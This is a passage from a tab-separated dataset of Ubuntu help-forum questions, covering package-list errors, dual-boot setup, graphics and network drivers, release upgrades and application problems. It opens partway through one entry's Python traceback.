/usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__ then i tried sudo apt-get install -- reinstall software-center and it yields reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . user @ user-svp132190x : ~ $ sudo apt-get install python-simplejson reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . user @ user-svp132190x : ~ $ sudo apt-get install -- reinstall python-pkg-resources reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i 'm a noob and dont know what to do . i barely got ubuntu to run on my sony vaio pro 13 64 bit . update manager also wont work
453864	new disk utility	i hate the new disk utility i held on to 12.04 for as long as possible do to this now that the new lts is out i upgraded now i want my old disk utility back how can i accomplish this . i have broken installs on 13.10 trying to do this so now i am asking here before i move on to a new linux distro .
453866	i am the admin but not the owner . how do i become the owner	i try to save /etc/default/grub after making edits , but i do n't have permission and only the owner can change permissions . how do i become the owner ?
453871	can i install ubuntu on samsung 350v5c ?	i am new to ubuntu and i have several questions before installing it : is there ui in german language ? can i install it along side windows 8 ( it 's on a 500gb hard drive with one partition ) is it possible to switch graphics cards on ubuntu os ? my laptop specs are : intel i7 3630qm cpu 2.4ghz two graphics cards ( intel 4000 hd and amd radeon hd 7670m ) 12gb ram
453874	not able to play .rm files	i have ubuntu 14.04 64-bit running on my hp probook . i can not play .rm video file using vlc or gnome m player . i have installed ubuntu restricted extras . how can i play the video files ? please help .
453875	why ca n't i boot into xen ?	i started out with a fresh install of ubuntu 14.04 server set up on a 10gb lvm partition . the only other thing i did was to then install the xen-hypervisor : sudo apt-get install xen-hypervisor-amd64 i double checked that my hardware could support it ( msi z87i motherboard and intel i5-4570s cpu ) and that i had virtualization set in the bios . i also double checked that grub defaults to boot into xen and that the xen toolchain is set to xl ( not that that would likely cause my problem ) . however , my system enters an endless cycle of booting up and rebooting until i tell grub to boot into regular ubuntu . here are the only things that show up whenever it tries booting into xen : loading xen 4.4-amd64 ... warning : no console will be available to the os loading linux 3.13.0-24-generic ... loading initial ramdisk ... and then it reboots the system . is there any error logs to check or any other boot parameters to try ( the parameters are still set to the default ) ? is it related to the above warning ? edit : i gave up since there was nothing to go on and ended up dual-booting windows and ubuntu . i 'd be willing to re-install on another partition if anyone has any ideas however .
453876	how to install synaptiks on touchpad on ubuntu 14.04	i 've recently upgraded my system to ubuntu 14.04 lts version but previously i was in ubuntu 13.10 where i used to operate my touchpad with circle scrolling . but now in the ubuntu 14.04 there is no `` synaptiks `` package on ubuntu software center so please help me to install the package or any alternative to use circle scrolling ?
453877	`` starting wireless hotspot ... '' but nothing happens	i was trying to create an wifi hotspot for my android device . i used ap-hotspot to do so . i configured the ap-hotspot using sudo ap-hotspot configure then i started ap-hotspot using sudo ap-hotspot start then it shows this starting wireless hotspot ... and then nothing happens , no further message is displayed , hotspot is not created . what is wrong ? how to fix it ?
453881	sip / voip account to empathy in 14.04 ( rakia or sofiasip ) ?	how can i add sip / voip capability in empathy in 14.04 ? is `` account-plugin-sip '' package enough or do i have to install other packages like `` telepathy-rakia '' / `` telepathy-sofiasip '' ?
453883	upgrade from 13.10 to 14.04 : `` no new release found ''	i am trying to upgrade from lubuntu 13.10 to 14.04 using apt-get update apt-get dist-upgrade do-release-upgrade however the last command returns no new release found i also tried do-release-upgrade -d with the same result . /etc/apt/sources.list looks like : # deb cdrom : [ lubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //de.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy universe deb http : //de.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //de.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //de.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main deb http : //dl.google.com/linux/earth/deb/ stable main # deb-src http : //archive.canonical.com/ubuntu saucy partner note that i just upgraded lubuntu another using the same servers without problems . file contents of /etc/update-manager/meta-releases # default location for the meta-release file [ metarelease ] uri = http : //changelogs.ubuntu.com/meta-release uri_lts = http : //changelogs.ubuntu.com/meta-release-lts uri_unstable_postfix = -development uri_proposed_postfix = -proposed /etc/update-manager/release-upgrades looks like : # some comments ... prompt=normal i also changed normal to lts without success . i also checked the directory /var/lib/ubuntu-release-upgrader/ which is empty . there is also no proxy file in /etc/apt/apt.conf.d/ so no proxy seems to be used . the file /etc/hosts looks like : 127.0.0.1 localhost 127.0.1.1 mybox # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters so i tried every solution from distribution upgrade problem `` no new release found '' without success . any idea what may be wrong here ? edit using the graphical interface update-manager i got the error message : `` failed to download repository information '' perhaps this gives you a hint how to solve the problem . edit2 i now changed from the de servers to the main servers and removed all ppas from my sources.list and sources.list.d . if possible using ppa-purge . if not i purged the relevant packages with aptitude and then removed the ppa-entries . the ppa 's where about following packages : sagemath , google-earth , handbrake , freetuxtv and julia ( a math program ) . however without success .
453884	ubuntu server : ssd + existing lvm disks	i 'm currently using the following setup for a home nas server : - debian installation on a 150 gb hdd ( with lvm ) - a logical volume of 4gb that consists of 2 2tb disks i would like to replace the hdd with the debian installation with an ssd , and install ubuntu server instead of debian . what would be the best way to set this up ? would i be better of installing ubuntu without lvm on the ssd , and installing lvm later to mount the existing logical volume ? or should i configure the ssd with lvm as well during the installation ? i 'm asking this because i 'm not sure if ssds work well with lvm or not .
453888	copying from live cd requires permisison	due to a system crash , i am using a live cd to boot the system and copy all important files from my computer to an external drive . however there are some files for which i receive an error msg : error copying ... . you do not have the permission how do i tell the system that i am the same owner of that file ? i ca n't access the original file because the system ( ubuntu 12.04 ) has crashed after an update and before i try to repair it with the live cd , i want to save my home folder . how to do it ?
453897	gnucash with dutch translation ?	i want to use gnucash . however i am not familiar with the english terminalogy regarding finance . now i wanted to start gnucash with the dutch translation , which i believe is available for 2 reasons . firstly the gnucash site is also in dutch , and secondly when i look to the wiki regarding starting gnucash with a different language i see also the dutch translation been specified . the problem i have is that i can not seem gnucash to startup with the dutch translation using language=nl_nl.utf8 lang=nl_nl.utf8 gnucash checking locale -a , i obtain : c c.utf-8 en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_hk.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.utf8 en_za.utf8 en_zm en_zm.utf8 en_zw.utf8 nl_aw nl_aw.utf8 nl_be.utf8 nl_nl.utf8 posix so why do n't i get gnucash to startup with the dutch language ? -edit- i installed all the dutch language packages by sudo apt-get install language-pack-nl language-pack-gnome-nl language-pack-nl-base language-pack-gnome-nl-base still no success unfortunately . however when i now tried to startup gnucash using language=nl gnucash i did n't get the warning the locale defined in the environment is n't supported . falling back to the 'c ' ( us english ) locale . however gnucash was still in english . -edit2- output of locale lang=nl_nl.utf-8 language=nl : en lc_ctype= '' nl_nl.utf-8 '' lc_numeric=nl_nl.utf-8 lc_time=nl_nl.utf-8 lc_collate= '' nl_nl.utf-8 '' lc_monetary=nl_nl.utf-8 lc_messages= '' nl_nl.utf-8 '' lc_paper=nl_nl.utf-8 lc_name=nl_nl.utf-8 lc_address=nl_nl.utf-8 lc_telephone=nl_nl.utf-8 lc_measurement=nl_nl.utf-8 lc_identification=nl_nl.utf-8 lc_all=
453901	install software with dpkg	i installed sme dpkg -i sme.deb , it installed it but i could not start it . however when i started the software center it told me that something was broken and it needed fixing , so i allowed it and after it was finished , sme started . so what i want to know should i install deb files with dpkg -i commend or should i use other commend ? ? ? thank you for your time
453902	problem in setting up amd dual graphics trinity [ radeon hd 7660g ] and thames [ radeon hd 7500m/7600m series ]	i am having problem in setting up amd dual graphics trinity [ radeon hd 7660g ] and thames [ radeon hd 7500m/7600m series ] . trinity is working fine . i am unable to switch to my thames graphic , amdcccle showing them as unknown display . this is the output from lspci $ lspci | grep -i vga 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] trinity [ radeon hd 7660g ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] i have installed fglrx using following commands . sudo apt-get install linux-headers-generic sudo apt-get install fglrx fglrx-amdcccle sudo amdconfig -- adapter=all -- initial this is output for fglrxinfo $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7660g opengl version string : 4.3.12798 compatibility profile context 13.35.1005 please help me if there is some other way to switch the graphics or i need to install something else . i have observed that my xorg.conf file is getting changed as i am restarting the system . when i ran sudo aticonfig -- initial -f -- adapter=all the content of file was $ cat xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` aticonfig-screen [ 1 ] -0 '' rightof `` aticonfig-screen [ 0 ] -0 '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 1 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:0:1:0 '' endsection section `` device '' identifier `` aticonfig-device [ 1 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 1 ] -0 '' device `` aticonfig-device [ 1 ] -0 '' monitor `` aticonfig-monitor [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection` but when i restarted the system and found no effect , then i checked the file again . this the content which is different from earlier . $ cat xorg.conf section `` device '' identifier `` default card 0 '' busid `` pci:0 @ 0:1:0 '' endsection section `` device '' identifier `` default card 1 '' busid `` pci:1 @ 0:0:0 '' endsection so content is getting changed on restart . what to do : (
453903	how do i turn around my object in blender ?	everything worked in fedora ... but then i switched to ubuntu . i got blender with apt-get and launched it . it 's good , but i ca n't get one thing : i used the middle mouse button to turn while using it in fedora , and it dos n't work now . how to i turn around my object ? ubuntu 14.04 trusty tahr using blender 2.69 from apt repo .
453904	is it possbile to make files with a certain word be automatically moved to a specific folder ?	i have a wallpapers folder under pictures and whenever i set any of them as wallpaper ubuntu makes a copy of it that says `` ( copy ) '' . how do i make them automatically move to a different folder ?
453905	i do n't know how to dual-boot lubuntu 14.04	quite simply , i do n't know what i 'm doing and i 've come to the screen where it has the options : erase disk and install lubuntu , encrypt , use lvm or something else . i want to keep my windows 7 , and i 'm not sure whether to use lvm ( logical volume management ) or 'something else ' ( custom partitioning ) . so , how do i dual-boot windows 7 and lubuntu ?
453906	how to disable or reorder gnome-terminal right-click context menu ?	i 'm using gnome terminal 3.6.2 on ubuntu 14.04 . on my trackpad i 'm frequently accidentally opening a new terminal ( even though i 've disabled tap-to-click ) , i think the prominent placement of 'open terminal ' here is to blame . can i remove that entry or re-order them ? it would be great to have copy come first and paste second ? i use those much more often that opening a tab or terminal ( intentionally ) . update i can duplicate the behavior ( in 13.10 ) with a mouse- right clicking and dragging diagonally right and down will open a new terminal , but only if done quickly . if i right click and pause then i have to left click the menu options as expected . update 2 it 's starting to become more clear : there is an intentional feature of the right click menu that allows a right click and hold followed by the release of the right click on the context menu item of choice , which coexists with the right click release followed by a selection of the menu item and second right or left click . the problem for me is when i 'm intending to right click release and then select a menu item and a perform a second click . if the cursor is already moving down and right , or if i begin to make that move before releasing the right click , i get the undesired new terminal . i may be unconsciously trying to optimize the operation by getting a running start , or it is just random mouse movement .
453916	sublime text 3 not working on lan	hello i 'm a little time using ubuntu system and am having trouble using sublime text 3 network . when i create a project i can see all the files and folders update without any problem . but when using network file just can not view or make edits . if i delete a file or folder sublime simply does nothing . i wonder if anyone here has been there . hugs !
453919	ethernet adapter ar8161 not connecting 13.04	i 've scoured the internet looking for a solution for my problem but have be unsuccessful . i have looked at and tried just about every possible solution on the internet . a majority of my find have been to install the drive like this post 13.04 ethernet adapter not connecting ( ar8161 ) unfortunately i run into lots of errors during the make process and i am pretty sure that my interfaces file or something is configured wrong as well . please help this is driving me nuts ! lshw -c network *-network description : ethernet interface product : ar8161 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 74 : d4:35:31 : e5:95 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:41 memory : fddc0000-fddfffff ioport : df00 ( size=128 ) *-network description : wireless interface physical id : 1 bus info : usb @ 2:6 logical name : wlan0 serial : 64:66 : b3:0a:62:94 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.11.0-20-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn ifconfig eth0 link encap : ethernet hwaddr 74 : d4:35:31 : e5:95 inet6 addr : fe80 : :76d4:35ff : fe31 : e595/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:13745 errors:0 dropped:0 overruns:0 frame:0 tx packets:13745 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5016048 ( 5.0 mb ) tx bytes:5016048 ( 5.0 mb ) wlan0 link encap : ethernet hwaddr 64:66 : b3:0a:62:94 up broadcast multicast mtu:1500 metric:1 rx packets:1439 errors:0 dropped:0 overruns:0 frame:0 tx packets:2202 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:656713 ( 656.7 kb ) tx bytes:584832 ( 584.8 kb ) interfaces auto lo iface lo inet loopback alx select [ 35mprocessing new driver-select request ... [ 00m backup exists : [ 36mmakefile.bk [ 00m backup exists : [ 36mmakefile.bk [ 00m backup exists : [ 36mdrivers/net/ethernet/broadcom/makefile.bk [ 00m backup exists : [ 36mdrivers/net/ethernet/atheros/makefile.bk [ 00m backup exists : [ 36mmakefile.bk [ 00m backup exists : [ 36mmakefile.bk [ 00m backup exists : [ 36mdrivers/net/ethernet/broadcom/makefile.bk [ 00m make make -c /lib/modules/3.11.0-20-generic/build m=/home/dassever/compat-drivers-2013-03-28-5-u modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-20-generic' cc [ m ] /home/dassever/compat-drivers-2013-03-28-5-u/compat/main.o in file included from /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-2.6.h:75:0 , from < command-line > :0 : /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:91:52 : warning : ‘struct fb_info’ declared inside parameter list [ enabled by default ] static inline void fb_enable_skip_vt_switch ( struct fb_info *info ) ^ /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:91:52 : warning : its scope is only this definition or declaration , which is probably not what you want [ enabled by default ] /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h : in function ‘backport_fb_enable_skip_vt_switch’ : /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:93:6 : error : dereferencing pointer to incomplete type info- > skip_vt_switch = true ; ^ make [ 3 ] : *** [ /home/dassever/compat-drivers-2013-03-28-5-u/compat/main.o ] error 1 make [ 2 ] : *** [ /home/dassever/compat-drivers-2013-03-28-5-u/compat ] error 2 make [ 1 ] : *** [ _module_/home/dassever/compat-drivers-2013-03-28-5-u ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-20-generic' make : *** [ modules ] error 2 sudo make install warning : you may or may not need to update your initramfs , you should if any of the modules installed are part of your initramfs . to add support for your distribution to do this automatically send a patch against ./scripts/update-initramfs . if your distribution does not require this send a patch against the '/usr/bin/lsb_release -i -s ' : `` ubuntu '' tag for your distribution to avoid this warning . make -c /lib/modules/3.11.0-20-generic/build m=/home/dassever/compat-drivers-2013-03-28-5-u modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-20-generic' cc [ m ] /home/dassever/compat-drivers-2013-03-28-5-u/compat/main.o in file included from /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-2.6.h:75:0 , from < command-line > :0 : /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:91:52 : warning : ‘struct fb_info’ declared inside parameter list [ enabled by default ] static inline void fb_enable_skip_vt_switch ( struct fb_info *info ) ^ /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:91:52 : warning : its scope is only this definition or declaration , which is probably not what you want [ enabled by default ] /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h : in function ‘backport_fb_enable_skip_vt_switch’ : /home/dassever/compat-drivers-2013-03-28-5-u/include/linux/compat-3.10.h:93:6 : error : dereferencing pointer to incomplete type info- > skip_vt_switch = true ; ^ make [ 3 ] : *** [ /home/dassever/compat-drivers-2013-03-28-5-u/compat/main.o ] error 1 make [ 2 ] : *** [ /home/dassever/compat-drivers-2013-03-28-5-u/compat ] error 2 make [ 1 ] : *** [ _module_/home/dassever/compat-drivers-2013-03-28-5-u ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-20-generic' make : *** [ modules ] error 2
453926	how to solve overheating problem ?	i have windows 7 and ubuntu 12.10 installed . my laptop specs are dell xps 15 4gb ram nvidia gt540m i 've been searching for hours but ca n't figure out a solution . i am a complete newbie to ubuntu . i 've installed tlp but the only thing i was able to do with it was to know my cpu temperature is 75c . i executed sudo tlp start but there has n't been any change in temperature .
453930	dual boot windows 8.1 and ubuntu 14.04	this is my first time trying to install ubuntu . i have a flash drive that will boot to the installation . but once i egg there it says it ca n't find an os on the computer . what do i do ?
453931	installing texlive 2013 with starlinq instructions	i 'm following this guide on how to install tex live on ubuntu 12.04 ( and i 'm trying to install tex live 2013 , not 2012. ) . i want to install all the packages ( except for the language support , i just need english ( uk ) ) . in this section it starts getting vague : setting environment variables add new paths to your environment variables . in ~/.profile add finally the lines : path=/usr/local/texlive/2012/bin/i386-linux : $ path ; export path manpath=/usr/local/texlive/2012/texmf/doc/man : $ manpath ; export manpath infopath=/usr/local/texlive/2012/texmf/doc/info : $ infopath ; export infopath finally do the manpath mapping , open the terminal and type $ sudo gedit /etc/manpath.config find the section with # set up path to manpath mapping . at the end of this section add the following line . manpath_map /usr/local/texlive/2012/bin/i386-linux /usr/local/texlive/2012/texmf/doc/man now we can close the gedit window . where exactly do i add the path , manpath , infopath lines in the profile file ? right at the bottom ? the manpath_map line does n't exactly fit neatly in the predefined columns in this section , so does the amount of spacing in manpath_map /usr/local/texlive/2012/bin/i386-linux /usr/local/texlive/2012/texmf/doc/man actually matter ?
453933	xserver crashes while turning on the second screen with new nvidia driver on 14.04	i have recently updated kubuntu to 14.04 and installed new nvidia drivers for my gt 630m ( optimus ) . after upgrade my second display connected over hdmi with dvi adapter was turned off , so i tried to turn it on in system settings and i get kmsserver failes to start . check your installation then xserver crashes and restarts . it 's also interesting , that if i connect the second display over vga , it works fine , until i try to change the configuration from system settings . how to fix it ?
453934	cursor became cross-mark	suddenly my cursor in ubuntu 14.04 lts has become a cross mark in gnome-desktop . i 've just installed oneko . does this have something to do with the cursor ?
453935	how to set default save location	with windows if you save a new file from a certain application , it will usually remember the folder you saved it so the next time you save a new file from that app it will automatically open that folder . with ubuntu it 's been sort of frustrating that every time i try to save a file from , for example idle , i have to navigate to home/documents/programming/python/ to save it where i want . some applications you can set save paths , but not all of them . is there a way to set up ubuntu so that when i ctrl-s from the same application , it will remember the previous folder i saved from ? or at least set up the default location to documents , to save myself a couple of steps and automatically go to a folder i 'm more likely to want to save files in ? thanks in advance .
453936	how do i partition using the lubuntu installer ? ( 14.04 )	i 've googled it but only a ubuntu guide came up , which had options lubuntu does n't have . i have 4 partitions come up , and no way to add a new one so far as i can see . sda1 , sda2 , sda3 and sda4 . sda1 is 208mb and says windows 7 ( loader ) under 'system ' . sda2 is 480gb ( roughly - bare in mind my hard drive is only 500gb ) and also say windows 7 ( loader ) .sda3 is 'windows recovery loader ' and takes up 18gb ' . sda4 is 108mb , and has nothing written under 'system ' . i would have thought that i would expand sda4 seeing as it does n't seem to be doing anything , but it has 33mb being used . i do n't know how to create a new partition so can someone please help me out ?
453940	very slow internet connection on ubuntu 14.04	my internet is very slow since i upgraded to ubuntu 14.04 here is all info i got http : //pastebin.ubuntu.com/7317131/
453941	cuda6.0 does not run on 14.04	i have installed on my homegrown system a gefporce 450gts graphics card an should like to use its gpu in my hobby projects ( mainly chess in either c++ or python ) the current cuda6.0 package installs without a hitch , including the shipped research driver , howevet the examples do n't run : there is no device . how can i detect if this is a ubuntu or a nvidia problem . i am not trying to put the blame on a specific doorstep , but i want to solve an honest to allah technical problem and i am trying to do that for some years now an angry old man joop renes
453942	deluge can write to file afger restart	if i restart deluge torrent downloader , the torrents do not continue downloading . the error meassge is : permission denied in the file tab of each torrent . if i add new torrents to download , everything works , just continuing to download the same torrent after restart gives this error . i am saving the files to a ntfs drive that is also used by win7 ( dualboot ) . the drive is owned by root and the permissions are 777 on all files/folders if i check with `` ls -l '' in terminal . any ideas why this is ? edit : i jst found out that if i start deluge with sudo from the terminal , everything works . is there a way to always start with su ? wha would be the `` best practice '' for this ?
453944	drivers for intel ich9r chip ... gigabyte x48t dq6 mb ... ubuntu 14.04	my ubuntu os is not 'seeing ' my two re-writers , which are connected to gsata . it 's hit and miss whether the os 'sees ' my hdds connected to the intel sata connectors . when i installed win 7 , these drivers were the first i installed . on gigabyte 's website , they say go to intel for drivers or third party . i can only find ich9r drivers for linux raid servers using these chips . are these drivers available for the following ? intel sata raid/ahci driver gigabyte sata2 preinstall driver ( for ahci / raid mode ) thanks for your help .
453945	ubuntu 14.04 on acer c720 boots to black screen w/ flashing cursor . using legacy boot	i flashed a usb drive with 14.04 using startup disk creator , no errors . i booted into bios , chose the usb and got to the black screen , but never passed it . i tried all of the different video modes already , and look for other solutions on the internet . nothing so far has worked . does anybody know anything ? again , i 'm booting from an acer c720 chromebook from bios .
453951	how install truecrypt on ubuntu 14.04 lts 32 bit	1.i have downloaded the linux version from http : //www.truecrypt.org/downloads 2 . right click on the file ( truecrypt-7.1a-linux-x86.tar.gz ) , - > open with archive manager . 3 . double click on the extracted file ( truecrypt-7.1a-setup-x86 ) , nothing happens . someone can help me installing truecrypt on ubuntu 14.04 lts 32 bit ? solution ! ! the extracted file works if in the terminal is typed : ./truecrypt-7.1a-setup-x86
453952	how can i create a dual boot , keeping in mind my pc boots to ubuntu ?	so i got 2 new 500gb hard drives and i installed windows 7 first on the first hard drive and on the second i installed 12.04 ubuntu . is there any software that i can use to make it easier to get a boot menu to choose the os that i want to boot into ?
453953	how to `` redecorate '' windows ?	i right clicked the title bar of rhythmbox and `` un/decorate '' . now the title bar is gone . i want it back and i ca n't figure out how . i tried hitting d but nothing happens .
453954	gpu lockup during trusty tahr 14.04 installation	i have a problem with ubuntu 14.04 installation . i boot up the disc , it loads , then it takes me to a white empty screen and gets stuck for a while . after that terminal opens telling that my gpu has locked up . i am aware i could resolve this by installing video drivers , but hey , i have n't even installed my ubuntu : ( i am pretty sure it 's because of my gpu ( an old nvidia 9500gt ) , but i 'm still saving up for a new one . i have faced a problem when installing ubuntu 12.04 on this particular machine . it used to get stuck at some point also , but it once did not and i do n't know why . i happilly installed my pangolin back then after that lucky case .
453956	how to install `` bought '' softwares from the command line ?	i love doing things the command-line way and need to install some proprietary softwares that are available free of cost but have to be `` bought '' from the software center : how do i install such softwares from the command-line ?
453957	can not search for packages to install using muon or synaptic	i installed kubuntu 14.04 fresh . the package list is up to date . the problem is i can not search for packages to install using muon or synaptic . the package is there in the list of packages . but when i search for it , both package managers show nothing .
453958	4k video downloader wo n't launch in ubuntu 14.04	i have installed 4k video downloader on ubuntu 14.04 lts and the program wo n't start . it appears on launcher but when i click on app it wo n't start . i install another software unified remote server usig the .deb file from the official website and it 's the same problem . i make a print screen when i right clicked on software [ img ] http : //i.imgur.com/wbarxaw.png [ /img ] i reistal the os and i got the same problem . anyone can help me ? thanks
453959	how to block text messages poping into actives ttya ?	due to that bug , i get text messages messing up my ttys , at every minute . notice that that messages appear on any ttys , even before logging in ; but only when the tty is active . the worst is when i am using whole-screen applications such as emacs , vim or aptitude . is it possible to get rid of that kind of annoying , intrusive , misplaced warnings ? i use ubuntu 12.04 . ( but it sounds like it 's a linux core problem , as arch-linux and debian also have this bug ) i use a laptop : vostro , dell . thanks in advance for any help .
453960	adding extract tool to nautilus ( compiled from source code )	how can add and extract zip file tool to nautilus ? i installed nautilus from the standard source code in repository . now : ? i remember there was a extract here selection in this menu before installing nautilus from source code .
